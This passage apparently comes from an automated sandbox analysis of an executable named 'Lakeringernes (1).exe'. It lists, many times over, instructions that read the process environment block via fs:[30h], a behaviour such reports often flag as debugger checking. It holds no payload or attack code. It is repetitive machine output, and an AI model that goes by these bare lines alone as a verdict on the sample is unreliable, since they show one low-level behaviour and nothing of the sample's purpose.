Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87BC6E mov eax, dword ptr fs:[00000030h] 6_2_1D87BC6E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87BC6E mov eax, dword ptr fs:[00000030h] 6_2_1D87BC6E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83CC68 mov eax, dword ptr fs:[00000030h] 6_2_1D83CC68
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D840C79 mov eax, dword ptr fs:[00000030h] 6_2_1D840C79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D840C79 mov eax, dword ptr fs:[00000030h] 6_2_1D840C79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D840C79 mov eax, dword ptr fs:[00000030h] 6_2_1D840C79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D848C79 mov eax, dword ptr fs:[00000030h] 6_2_1D848C79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D848C79 mov eax, dword ptr fs:[00000030h] 6_2_1D848C79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D848C79 mov eax, dword ptr fs:[00000030h] 6_2_1D848C79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D848C79 mov eax, dword ptr fs:[00000030h] 6_2_1D848C79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D848C79 mov eax, dword ptr fs:[00000030h] 6_2_1D848C79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C8F8B mov eax, dword ptr fs:[00000030h] 6_2_1D8C8F8B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C8F8B mov eax, dword ptr fs:[00000030h] 6_2_1D8C8F8B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C8F8B mov eax, dword ptr fs:[00000030h] 6_2_1D8C8F8B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov ecx, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850F90 mov eax, dword ptr fs:[00000030h] 6_2_1D850F90
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86BF93 mov eax, dword ptr fs:[00000030h] 6_2_1D86BF93
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D841FAA mov eax, dword ptr fs:[00000030h] 6_2_1D841FAA
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D844FB6 mov eax, dword ptr fs:[00000030h] 6_2_1D844FB6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86CFB0 mov eax, dword ptr fs:[00000030h] 6_2_1D86CFB0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86CFB0 mov eax, dword ptr fs:[00000030h] 6_2_1D86CFB0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D878FBC mov eax, dword ptr fs:[00000030h] 6_2_1D878FBC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83BFC0 mov eax, dword ptr fs:[00000030h] 6_2_1D83BFC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h] 6_2_1D8C1FC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D839FD0 mov eax, dword ptr fs:[00000030h] 6_2_1D839FD0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFFDC mov eax, dword ptr fs:[00000030h] 6_2_1D8BFFDC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFFDC mov eax, dword ptr fs:[00000030h] 6_2_1D8BFFDC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFFDC mov eax, dword ptr fs:[00000030h] 6_2_1D8BFFDC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFFDC mov ecx, dword ptr fs:[00000030h] 6_2_1D8BFFDC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFFDC mov eax, dword ptr fs:[00000030h] 6_2_1D8BFFDC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFFDC mov eax, dword ptr fs:[00000030h] 6_2_1D8BFFDC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FEFD3 mov eax, dword ptr fs:[00000030h] 6_2_1D8FEFD3
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov ecx, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov ecx, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov ecx, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov ecx, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 mov eax, dword ptr fs:[00000030h] 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914FFF mov eax, dword ptr fs:[00000030h] 6_2_1D914FFF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D868FFB mov eax, dword ptr fs:[00000030h] 6_2_1D868FFB
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85CF00 mov eax, dword ptr fs:[00000030h] 6_2_1D85CF00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85CF00 mov eax, dword ptr fs:[00000030h] 6_2_1D85CF00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFF03 mov eax, dword ptr fs:[00000030h] 6_2_1D8BFF03
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFF03 mov eax, dword ptr fs:[00000030h] 6_2_1D8BFF03
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFF03 mov eax, dword ptr fs:[00000030h] 6_2_1D8BFF03
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87BF0C mov eax, dword ptr fs:[00000030h] 6_2_1D87BF0C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87BF0C mov eax, dword ptr fs:[00000030h] 6_2_1D87BF0C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87BF0C mov eax, dword ptr fs:[00000030h] 6_2_1D87BF0C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914F1D mov eax, dword ptr fs:[00000030h] 6_2_1D914F1D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D880F16 mov eax, dword ptr fs:[00000030h] 6_2_1D880F16
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D880F16 mov eax, dword ptr fs:[00000030h] 6_2_1D880F16
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D880F16 mov eax, dword ptr fs:[00000030h] 6_2_1D880F16
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D880F16 mov eax, dword ptr fs:[00000030h] 6_2_1D880F16
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C8F3C mov eax, dword ptr fs:[00000030h] 6_2_1D8C8F3C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C8F3C mov eax, dword ptr fs:[00000030h] 6_2_1D8C8F3C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C8F3C mov ecx, dword ptr fs:[00000030h] 6_2_1D8C8F3C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C8F3C mov ecx, dword ptr fs:[00000030h] 6_2_1D8C8F3C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DF36 mov eax, dword ptr fs:[00000030h] 6_2_1D85DF36
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DF36 mov eax, dword ptr fs:[00000030h] 6_2_1D85DF36
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DF36 mov eax, dword ptr fs:[00000030h] 6_2_1D85DF36
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DF36 mov eax, dword ptr fs:[00000030h] 6_2_1D85DF36
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83FF30 mov edi, dword ptr fs:[00000030h] 6_2_1D83FF30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FBF4D mov eax, dword ptr fs:[00000030h] 6_2_1D8FBF4D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FAF50 mov ecx, dword ptr fs:[00000030h] 6_2_1D8FAF50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FEF66 mov eax, dword ptr fs:[00000030h] 6_2_1D8FEF66
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914F7C mov eax, dword ptr fs:[00000030h] 6_2_1D914F7C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83BF70 mov eax, dword ptr fs:[00000030h] 6_2_1D83BF70
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D841F70 mov eax, dword ptr fs:[00000030h] 6_2_1D841F70
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AF72 mov eax, dword ptr fs:[00000030h] 6_2_1D86AF72
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D896F70 mov eax, dword ptr fs:[00000030h] 6_2_1D896F70
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83EF79 mov eax, dword ptr fs:[00000030h] 6_2_1D83EF79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83EF79 mov eax, dword ptr fs:[00000030h] 6_2_1D83EF79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83EF79 mov eax, dword ptr fs:[00000030h] 6_2_1D83EF79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86BE80 mov eax, dword ptr fs:[00000030h] 6_2_1D86BE80
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AE89 mov eax, dword ptr fs:[00000030h] 6_2_1D86AE89
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AE89 mov eax, dword ptr fs:[00000030h] 6_2_1D86AE89
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87CEA0 mov eax, dword ptr fs:[00000030h] 6_2_1D87CEA0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov eax, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov eax, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov eax, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 mov eax, dword ptr fs:[00000030h] 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D900EAD mov eax, dword ptr fs:[00000030h] 6_2_1D900EAD
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D900EAD mov eax, dword ptr fs:[00000030h] 6_2_1D900EAD
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872EB8 mov eax, dword ptr fs:[00000030h] 6_2_1D872EB8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872EB8 mov eax, dword ptr fs:[00000030h] 6_2_1D872EB8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D909ED2 mov eax, dword ptr fs:[00000030h] 6_2_1D909ED2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C7EC3 mov eax, dword ptr fs:[00000030h] 6_2_1D8C7EC3
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C7EC3 mov ecx, dword ptr fs:[00000030h] 6_2_1D8C7EC3
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914EC1 mov eax, dword ptr fs:[00000030h] 6_2_1D914EC1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D881ED8 mov eax, dword ptr fs:[00000030h] 6_2_1D881ED8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87BED0 mov eax, dword ptr fs:[00000030h] 6_2_1D87BED0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CCED0 mov ecx, dword ptr fs:[00000030h] 6_2_1D8CCED0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D843EE2 mov eax, dword ptr fs:[00000030h] 6_2_1D843EE2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FEEE7 mov eax, dword ptr fs:[00000030h] 6_2_1D8FEEE7
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D871EED mov eax, dword ptr fs:[00000030h] 6_2_1D871EED
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D871EED mov eax, dword ptr fs:[00000030h] 6_2_1D871EED
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D871EED mov eax, dword ptr fs:[00000030h] 6_2_1D871EED
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D842EE8 mov eax, dword ptr fs:[00000030h] 6_2_1D842EE8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D842EE8 mov eax, dword ptr fs:[00000030h] 6_2_1D842EE8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D842EE8 mov eax, dword ptr fs:[00000030h] 6_2_1D842EE8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D842EE8 mov eax, dword ptr fs:[00000030h] 6_2_1D842EE8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E3EFC mov eax, dword ptr fs:[00000030h] 6_2_1D8E3EFC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83CEF0 mov eax, dword ptr fs:[00000030h] 6_2_1D83CEF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83CEF0 mov eax, dword ptr fs:[00000030h] 6_2_1D83CEF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83CEF0 mov eax, dword ptr fs:[00000030h] 6_2_1D83CEF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83CEF0 mov eax, dword ptr fs:[00000030h] 6_2_1D83CEF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83CEF0 mov eax, dword ptr fs:[00000030h] 6_2_1D83CEF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83CEF0 mov eax, dword ptr fs:[00000030h] 6_2_1D83CEF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846E00 mov eax, dword ptr fs:[00000030h] 6_2_1D846E00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846E00 mov eax, dword ptr fs:[00000030h] 6_2_1D846E00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846E00 mov eax, dword ptr fs:[00000030h] 6_2_1D846E00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846E00 mov eax, dword ptr fs:[00000030h] 6_2_1D846E00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D843E01 mov eax, dword ptr fs:[00000030h] 6_2_1D843E01
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D843E14 mov eax, dword ptr fs:[00000030h] 6_2_1D843E14
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D843E14 mov eax, dword ptr fs:[00000030h] 6_2_1D843E14
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D843E14 mov eax, dword ptr fs:[00000030h] 6_2_1D843E14
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D878E15 mov eax, dword ptr fs:[00000030h] 6_2_1D878E15
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914E03 mov eax, dword ptr fs:[00000030h] 6_2_1D914E03
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFE1F mov eax, dword ptr fs:[00000030h] 6_2_1D8BFE1F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFE1F mov eax, dword ptr fs:[00000030h] 6_2_1D8BFE1F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFE1F mov eax, dword ptr fs:[00000030h] 6_2_1D8BFE1F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BFE1F mov eax, dword ptr fs:[00000030h] 6_2_1D8BFE1F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83BE18 mov ecx, dword ptr fs:[00000030h] 6_2_1D83BE18
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D842E32 mov eax, dword ptr fs:[00000030h] 6_2_1D842E32
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D908E26 mov eax, dword ptr fs:[00000030h] 6_2_1D908E26
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D908E26 mov eax, dword ptr fs:[00000030h] 6_2_1D908E26
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D908E26 mov eax, dword ptr fs:[00000030h] 6_2_1D908E26
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D908E26 mov eax, dword ptr fs:[00000030h] 6_2_1D908E26
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87CE3F mov eax, dword ptr fs:[00000030h] 6_2_1D87CE3F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D6E30 mov eax, dword ptr fs:[00000030h] 6_2_1D8D6E30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D6E30 mov eax, dword ptr fs:[00000030h] 6_2_1D8D6E30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5E30 mov eax, dword ptr fs:[00000030h] 6_2_1D8D5E30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5E30 mov ecx, dword ptr fs:[00000030h] 6_2_1D8D5E30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5E30 mov eax, dword ptr fs:[00000030h] 6_2_1D8D5E30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5E30 mov eax, dword ptr fs:[00000030h] 6_2_1D8D5E30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5E30 mov eax, dword ptr fs:[00000030h] 6_2_1D8D5E30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5E30 mov eax, dword ptr fs:[00000030h] 6_2_1D8D5E30
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83FE40 mov eax, dword ptr fs:[00000030h] 6_2_1D83FE40
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83AE40 mov eax, dword ptr fs:[00000030h] 6_2_1D83AE40
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83AE40 mov eax, dword ptr fs:[00000030h] 6_2_1D83AE40
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83AE40 mov eax, dword ptr fs:[00000030h] 6_2_1D83AE40
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83DE45 mov eax, dword ptr fs:[00000030h] 6_2_1D83DE45
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83DE45 mov ecx, dword ptr fs:[00000030h] 6_2_1D83DE45
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86EE48 mov eax, dword ptr fs:[00000030h] 6_2_1D86EE48
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BDE50 mov eax, dword ptr fs:[00000030h] 6_2_1D8BDE50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BDE50 mov eax, dword ptr fs:[00000030h] 6_2_1D8BDE50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BDE50 mov ecx, dword ptr fs:[00000030h] 6_2_1D8BDE50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BDE50 mov eax, dword ptr fs:[00000030h] 6_2_1D8BDE50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BDE50 mov eax, dword ptr fs:[00000030h] 6_2_1D8BDE50
